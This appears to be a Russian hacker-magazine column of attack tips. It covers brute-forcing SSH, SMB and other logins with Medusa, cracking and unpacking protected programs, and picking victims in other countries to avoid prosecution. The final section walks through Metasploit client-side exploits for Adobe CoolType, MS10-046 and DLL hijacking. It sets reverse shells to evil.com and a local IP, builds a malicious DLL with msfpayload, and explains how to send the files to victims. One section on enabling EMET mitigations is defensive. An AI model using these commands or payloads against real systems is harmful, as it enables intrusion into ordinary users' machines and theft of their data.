Задача: Пробрутить логин, пасс к POP3, FTP, SSH и т.д.

 

Решение

Брутфорс – вещь достаточно полезная и приятная, особенно когда нет каких-то четких ограничений по времени. Включил брутилку – и занимайся своими делами. А через пару дней – плоды собирай. Да и вообще, ни один пен-тест без брута не обходится. Некоторые не верят в брут (а ты веришь в брут? 🙂 Типа, подбором можно заниматься годами…

Но сервисов всяких много и по работе, и по досугу. К каждому пасс требуется знать. А обычному юзеру тяжко от этого, особенно с учетом корпоративных политик, когда каждый месяц надо что-то новое придумывать.

Потому и выбирают пароли в стиле:

123456
Password
iloveyou
princess
rockyou (название «конторы»)
abc123
Qwerty
Ashley
babygirl
monkey

Кстати, эти взяты из топа анализа 32 миллионов паролей, выполненного компанией Imperva (imperva.com/ld/password_report.asp). Тут уж грех не побрутить. А главное – и инструментарий есть.

Не считая всяких специализированных вещиц, основными брутфорсерами являются олдскульная THC-Hydra (freeworld.thc.org/thc-hydra/) и более модная Medusa (foofus.net/~jmk/medusa/medusa.html). Что приятно – и та, и другая входят в BackTrack4, хотя установка их не должна вызвать каких-то проблем (есть только *nix версии).

Во многом программы похожи: модульные, «многопоточные», с хорошо настраиваемыми возможностями. Основное различие в том, как распараллеливается процесс перебора: у Medusa – потоками, у Hydra – процессами. Что дает первой некое преимущество. Но есть еще более тонкие различия, особенно в модулях, так что желательно посмотреть сравнение возможностей тулз на foofus.net/~jmk/medusa/medusa-compare.html

Можно брутить следующее: TELNET, AFP, CVS, FTP, HTTP, HTTPS, SOCKS5, HTTP-PROXY, IMAP, MS-SQL, PostgreSQL, MySQL, NCP (NetWare), NNTP, PCNFS, PcAnywhere, POP3, rexec, rlogin, rsh, Teamspeak, SMB, SMBNT, SAP/R3, SMTP (AUTH/VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC, Cisco auth, ICQ, LDAPx и т.д.

А теперь хорошие новости: оба проекта были в неком забытьи, но теперь за них снова взялись и обещали не бросать :). Последняя версия Medusa – 2.0, Hydra – 5.7. Чего-то чрезвычайного или нового не добавили, но все же.

Пару примеров по Medus’е.
Подбираем рутовый пасс через SSH:

medusa -h victim.com -u root -P passwords.txt –M ssh

Где

  • -h, -u – задаем хост и под кем логиниться;
  • -P – список паролей для перебора;
  • -M – к какому сервису подбираем пасс.

Любой из элементов можно заменить списком или единичным значением, указав заглавную или обычную букву соответственно.

Брутим несколько хостов по SMB:

medusa -M smbnt -C combo.txt

Содержимое combo.txt имеет вид «хост:логин:пасс». Например:

192.168.0.2:administrator:password
192.168.0.2:testuser:pass
192.168.0.3:administrator:blah
192.168.0.4:user1:foopass

Возможностей по настройке брута, реально много, так что подстроить под конкретные потребности.

Кстати, для любителей мышки, есть версия гуиверсия – XHydra :).

Словари для перебора легко найти в интернете. Их там много. Например, на passwords.ru есть с заточкой под «российскую действительность». Также есть интересный проект awlg.org/index.gen, который по заданной теме составляет список релевантных слов, используя поисковики.

 

Задача: Быстро распаковать exe’шки, dll’ки

 

Решение

Наверное, каждый, кто провел за компьютером приличный кусок своей жизни, хоть раз хотел взломать какую-нибудь полюбившуюся платную программу. Узнавал о том, как это делается. Возможно, пытался. А у кого-то это даже получилось, и он стал зарабатывать этим делом себе на хлеб с маслом :). В инете по этому поводу много мануалов.

Кстати, если есть желание познать «истины социализма», то почитай цикл статей «Введение в крэкинг с нуля, используя OllyDbg» (wasm.ru/series.php?sid=17). Он большой, очень подробный, заточенный под практику и не требует каких-то особых начальных знаний. Прочтешь и поймешь – будешь на голову выше многих. Качественная вещь. Переводчикам – спасибо!

Но вернемся к задаче. Меня всегда напрягали всякие протекторы, шифровщики, пакеры у программок, когда хотелось по-быстрому поковырять функционал, пореверсить чуток. Копаться обычно времени нет. И вот, нашлось универсальное средство, решающее эти проблемы – Quick Unpack 2.2 (qunpack.ahteam.org/?p=436). Авторам – спасибо! С помощью нее можно обойти целую кучу самых распространенных шифровщиков, пакеров, протекторов, обфускаторов и восстановить исходный exe’шник. Например, восстанавливает из UPX, ASPack, PE Diminisher, PECompact, PE-PACK, PackMan, WinUPack и еще сотни других.

Из достоинств следует отметить, что восстанавливать можно также DLL’ки, есть импорт функций; можно дампить сам процесс, аттачась к нему, есть несколько OEP finder’ов, имеется поддержка скриптового языка LUA и многое другое (смотри в «хелпе»). Но это уже для тех, кто в теме :).

В основном же требуется всего пара кликов – указать файл, выбрать для него OEP finder и распаковать.

 

Задача: Получить телефонные номера мобильных юзеров

Решение: Цивилизация пришла и к нам. Такие технологии, как 3G и уже олдскульный GPRS, у всех на слуху, у всех в кармане. Поползать по сети с мобильника теперь совсем не проблема, ведь даже самые простые модели оснащены каким-то браузером. Да и тарифы операторов не кусаются. Вот только появляются косяки другого плана .

На прошедшей конференции «CanSecWest 2010» исследователь Collin Mulliner представил свои изыскания в области мобильных технологий (mulliner.org/security/feed/random_tales_mobile_hacker.pdf). Там много всего – от модификации читалок до DoS’а мобилок. Но в рамках нашей темы интересен раздел про раскрытие личной информации, такой как номер мобильника, например.

Из этого изыскания следует, что большинство операторов добавляют заголовки в HTTP-запросы. Это связано с тем, что когда ты выходишь в интернет с обычной трубки, то тебя пускают не напрямую в сеть, а через прокси, который и добавляет эти заголовки. В зависимости от оператора могут добавляться MSISDN (номер мобильного), IMEI (уникальный номер самого телефона) или IMSI (уникальный номер симки). У кого как. По сути, проблема в плохо сконфигурированных проксиках.

Зачем оно надо (в благих целях) – не совсем понятно. В злых – вариантов много, конфиденциальная информация, как-никак. Особенно с учетом того, что по мобильнику очень легко вычислить данные владельца.

Протестить своего оператора можно тут – mulliner.org/pc.cgi. Я проверил Билайн – получил номер мобильника, его модель, примерное положение. Думаю, у остальных ситуация не лучше.
Радует, что проблема касается только тех, кто ползает через ваповый инет, то есть пользователи КПК, всевозможных глазофонов и 3G-модемов могут спать спокойно, так как их не пропускают через злосчастный прокси.

 

Задача: Найти диапазоны IP-адресов по географической привязке

 

Решение

Согласись, зачастую нам все равно, кто будет нашей жертвой :). Особенно, если нам требуется получить много машин и/или мы ищем их какими-то автоматизированными способами. А чтобы защитить себя от длинных рук правосудия, мы, конечно же, используем всякие VPN’ы, проксики и другие средства для поддержания личной анонимности. Хорошим дополнением к перечисленному будет тот факт, что наши жертвы находятся в другой стане или на другом континенте. Тогда негативного фидбека можно не опасаться.

Задача на деле простая, и не совсем понятно, почему она вызывает у людей какие-то трудности.
Есть множество сайтов типа ipaddresslocation.org, worldips.info, где всего лишь требуется выбрать страну и нам покажут диапазоны IP-адресов.

К тому же, у регистраторов (RIPE, RIPN, etc.) есть поиск по базам. У RIPN’а (ru-center) он выделился в сайд-проект ipgeobase.ru. Так что мы можем найти диапазон, принадлежащий либо какой-то компании, либо какому-то конкретному лицу, либо находящийся в каком-то городе. Раздолье :). Не стоит забывать и о стандартном whois’е.

 

Задача: Включаем механизмы защиты Windows для ПО, которое их не поддерживает

 

Решение

Если ты был на CC’10, то наверняка посетил и проникся семинаром Алексея Синцова – «Обход защитных механизмов в ОС Windows». В зависимости от того, за какой баррикадой находишься ты, тебе могло стать либо радостно, либо страшно :). Доклад классный, его можно найти на party10.cc.org.ru.

Подведем итог: микрософтовцы, в общем, молодцы – внедрили в Win7 множество разных механизмов. И в определенных ситуациях можно даже создать «непробиваемую» систему. Вот только основная проблема в том, что для использования этих механизмов и само ПО, и все его модули должны быть собраны с их поддержкой.

А сторонние производители (даже гранды, например, Adobe, Mozillа) с этим грешат. В прошлом номере я писал о том, в каком широко распространенном ПО отсутствует поддержка DEP, ASLR и т.д.

Что еще хуже – конечному пользователю на это особо не повлиять. Типа, исходников нет – перекомпилить не можешь. Но так было до недавнего времени.
Возрадуемся! MS выпустила неофициальную тулзу, а точнее, ее вторую версию, которая поможет нам подключать необходимые механизмы (и даже больше) для процессов, вне зависимости от сборки программы. Имя ей – EMET 2.0, Enhanced Mitigation Experience Toolkit (blogs.technet.com/b/srd/archive/2010/09/02/enhanced-mitigation-experience-toolkit-emet-v2-0-0.aspx)

С помощью нее можно как настроить общие политики и включить DEP, SEHOP, ASLR для всей системы, так и выполнить настройки для конкретного приложения. Если точнее, то она позволяет включить для ПО и его модулей (вне зависимости от того, с какими опциями они собраны) следующие возможности: стандартные DEP, ASLR, SEHOP, а также защиту от heapspay’ев и шеллкодов.

Надо, конечно, понимать, что не все ПО будет корректно работать. Но в определенных ситуациях это помогает. Пример есть на сайте MS: 0day-эксплойт для Acrobat Reader под Win7 с обходом DEP, используя ROP, не работает, так как не-ASLR-библиотека была смещена в памяти EMET’ом (blogs.technet.com/b/srd/archive/2010/09/10/use-emet-2-0-to-block-the-adobe-0-day-exploit.aspx)

Программа работает минимум на WinXP c SP3, но поддержки SEHOP и ASLR тебе это не даст. Так что полную радость можно получить только на Win7 и Win2008.

 

Задача: Атакуем простых юзеров, используя client-side-сплоиты

 

Решение

Компьютеры теперь везде и вся. Несчастных юзеров полным-полно. Почему несчастных? Да потому что во многом они стали основной целью для «хакерских атак» :). Особенно с развитием всяких систем переводов, интернет-банкинга и других видов электронных денег. Теперь снять профит с обычного юзера – не проблема. И это уже не считая классики типа спама, ботнетов, DoS’ов, кражи конфиденциально информации. Антивирусы, фаеры, IDS’ы, системы обновления ПО, сэндбоксы спасают только небольшую толпу продвинутых юзеров/фирм, так как их надо и настроить, и правильно реагировать на угрозы, и купить само ПО. В итоге имеем широкий выбор из миллионов менеджеров/бухгалтеров для «работы» с ними :).

А тут еще и реально критические уязвимости от таких контор, как Microsoft и Adobe, чье ПО является де-факто стандартом по миру. Да, в этом смысле лето было богатым!
В качестве примера я приведу три сплоита: Adobe Acrobat PDF Cooltype Sing (версии <=9.3.4/8.2.4), MS DLL Hijacking, MS LNK сплоит(MS10-046). Описание подробностей сплоитов ты можешь прочитать в «Обзоре эксплойтов» от Алексея Синцова в этом и в прошлом номерах.

Как ни странно, все примеры реализованы с помощью Metasploit Framework. Тут надо отдать должное создателям MSF – они чрезвычайно быстро стали добавлять сплоиты к самым массовым критическим уязвимостям. Некоторые реализации уязвимостей и вовсе появляются сразу в MSF, без сторонних PoC’ов. Все три перечисленные уязвимости были 0-day, когда попали в MSF. Сейчас уже есть кое-какие патчи, но вернемся к делу.

1) Adobe Acrobat PDF Cooltype Sing. Adobe этим летом дал миру несколько суровых дыр. Это одна из них. Заходим в msfconsole и:

Выбираем сплоит:

msf > use exploit/windows/fileformat/adobe_cooltype_sing

Задаем имя файла:

msf > set FILENAME xakep_ubileinyi_vypusk.pdf

Куда сохраняем? В home:

msf > set OUTPUTPATH ~

Выбираем нагрузку и ее настройки:

msf > set PAYLOAD windows/shell/reverse_tcp
msf > set LHOST evil.com
msf > set LPORT 80

Теперь на наш evil.com вешаем netcat, например, и посылаем жертве файлик по почте.
Простой реверсовый шелл нужен, во-первых, чтобы обойти NAT, файер, а во-вторых, чтобы не привязываться к процессу (чтобы соединение не оборвалось при закрытии Acrobat Reader’а).

Есть аналогичный сплоит, но проводящий атаку через браузер и Adobe’овский плагин к нему – exploit/windows/browser/adobe_cooltype_sing.

2) MS LNK сплоит (MS10-046). Сплоит из разряда фич 🙂

Выбираем сплоит:

msf >use windows/browser/ms10_046_shortcut_icon_dllloader

Настраиваем пэйлоад:

msf >set PAYLOAD windows/meterpreter/reverse_tcp
msf >set LHOST 192.168.0.101

По сути, сплоит поднимает WebDAV и кидает туда ярлыки. В результате либо даем бедному пользователю полученную ссылку, либо делаем ярлычок на ресурс. То есть сплоит из локального стал удаленным (через шару и WebDAV). Павним бедного юзера – ему вряд ли что-то поможет :).
Злую DLL’ку для этого и следующего сплоита можно создать и ручками. Ярлычок, понятное дело, тоже.

$msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.101 D > evil.dll

Где

  • windows/meterpreter/reverse_tcp – название нагрузки,
  • LHOST=192.168.0.101 – настройки
  • D – указываем, что создаем DLL’ку;
  • evil.dll – имя итогового файла.

3) MS DLL Hijacking

Это очень забавная вещь! С ее помощью мы фактически можем «превратить» любой миролюбивый формат файла во что-то злое. Пришлют тебе файлы с какой-нибудь презентацией или чертежами AutoCAD’а, например. А среди них какая-то библиотечка валяется. Бывает ведь. Ты, конечно же, запустишь сам чертеж, а тут – бац! – и у тебя бэкдор. Хорошее дело!
Подробное описание «почему и зачем так» смотри на следующей странице у Алексея Синцова :).

А теперь – немного практики.

Выбираем сплоит:

msf > use windows/browser/webdav_dll_hijacker

Задаем имя файлов:

msf > set BASENAME policy

Задаем расширение файла:

msf > set EXTENSIONS ppt

Имя для шары:

msf > set SHARENAME docs

Нагрузка:

msf > set PAYLOAD windows/meterpreter/bind_tcp

После этого либо впариваем жертве ссылку на шару – \\192.168.0.101\docs\, либо на HTTP-сервак – http://192.168.0.101:80. Жертва открывает файлик – мы получаем шелл. Честный обмен :).

Опять же, по сути, локальная уязвимость превратилась в удаленную за счет шары и WebDAV. Вот такими тремя client-site багами мы можем положить на лопатки все версии Windows, от XP до 7. Антивири и файеры – тоже не помеха при небольших доработках методов :).

 

INFO

Все описанные программы и файл со ссылками во всей рубрике ищи на диске.

Оставить мнение

Check Also

LUKS container vs Border Patrol Agent. Как уберечь свои данные, пересекая границу

Не секрет, что если ты собрался посетить такие страны как США или Великобританию то, прежд…